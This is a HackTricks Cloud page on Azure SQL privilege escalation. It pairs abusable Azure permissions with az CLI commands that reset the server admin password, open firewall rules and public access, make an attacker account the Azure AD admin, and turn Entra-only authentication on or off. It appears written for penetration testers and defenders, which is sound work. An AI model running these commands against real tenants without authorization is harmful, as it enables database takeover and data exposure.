HackTricks CloudAz - SQL Database Privesc
Reading time: 5 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
SQL Database Privesc
For more information about SQL Database check:
"Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/write"
With these permissions, a user can perform privilege escalation by updating or creating Azure SQL servers and modifying critical configurations, including administrative credentials. This permission allows the user to update server properties, including the SQL server admin password, enabling unauthorized access or control over the server. They can also create new servers, potentially introducing shadow infrastructure for malicious purposes. This becomes particularly critical in environments where "Microsoft Entra Authentication Only" is disabled, as they can exploit SQL-based authentication to gain unrestricted access.
# Change the server password
az sql server update \
--name <server_name> \
--resource-group <resource_group_name> \
--admin-password <new_password>
# Create a new server
az sql server create \
--name <new_server_name> \
--resource-group <resource_group_name> \
--location <location> \
--admin-user <admin_username> \
--admin-password <admin_password>
Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
az sql server update \
--name <server-name> \
--resource-group <resource-group> \
--enable-public-network true
"Microsoft.Sql/servers/firewallRules/write"
An attacker can manipulate firewall rules on Azure SQL servers to allow unauthorized access. This can be exploited to open up the server to specific IP addresses or entire IP ranges, including public IPs, enabling access for malicious actors. This post-exploitation activity can be used to bypass existing network security controls, establish persistence, or facilitate lateral movement within the environment by exposing sensitive resources.
# Create Firewall Rule
az sql server firewall-rule create \
--name <new-firewall-rule-name> \
--server <server-name> \
--resource-group <resource-group> \
--start-ip-address <start-ip-address> \
--end-ip-address <end-ip-address>
# Update Firewall Rule
az sql server firewall-rule update \
--name <firewall-rule-name> \
--server <server-name> \
--resource-group <resource-group> \
--start-ip-address <new-start-ip-address> \
--end-ip-address <new-end-ip-address>
Additionally, Microsoft.Sql/servers/outboundFirewallRules/delete permission lets you delete a Firewall Rule.
NOTE: It is necesary to have the public access enabled
""Microsoft.Sql/servers/ipv6FirewallRules/write"
With this permission, you can create, modify, or delete IPv6 firewall rules on an Azure SQL Server. This could enable an attacker or authorized user to bypass existing network security configurations and gain unauthorized access to the server. By adding a rule that allows traffic from any IPv6 address, the attacker could open the server to external access."
az sql server firewall-rule create \
--server <server_name> \
--resource-group <resource_group_name> \
--name <rule_name> \
--start-ip-address <start_ipv6_address> \
--end-ip-address <end_ipv6_address>
Additionally, Microsoft.Sql/servers/ipv6FirewallRules/delete permission lets you delete a Firewall Rule.
NOTE: It is necesary to have the public access enabled
"Microsoft.Sql/servers/administrators/write" && "Microsoft.Sql/servers/administrators/read"
With this permissions you can privesc in an Azure SQL Server environment accessing to SQL databases and retrieven critical information. Using the the command below, an attacker or authorized user can set themselves or another account as the Azure AD administrator. If "Microsoft Entra Authentication Only" is enabled you are albe to access the server and its instances. Here's the command to set the Azure AD administrator for an SQL server:
az sql server ad-admin create \
--server <server_name> \
--resource-group <resource_group_name> \
--display-name <admin_display_name> \
--object-id <azure_subscribtion_id>
"Microsoft.Sql/servers/azureADOnlyAuthentications/write" && "Microsoft.Sql/servers/azureADOnlyAuthentications/read"
With these permissions, you can configure and enforce "Microsoft Entra Authentication Only" on an Azure SQL Server, which could facilitate privilege escalation in certain scenarios. An attacker or an authorized user with these permissions can enable or disable Azure AD-only authentication.
#Enable
az sql server azure-ad-only-auth enable \
--server <server_name> \
--resource-group <resource_group_name>
#Disable
az sql server azure-ad-only-auth disable \
--server <server_name> \
--resource-group <resource_group_name>
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.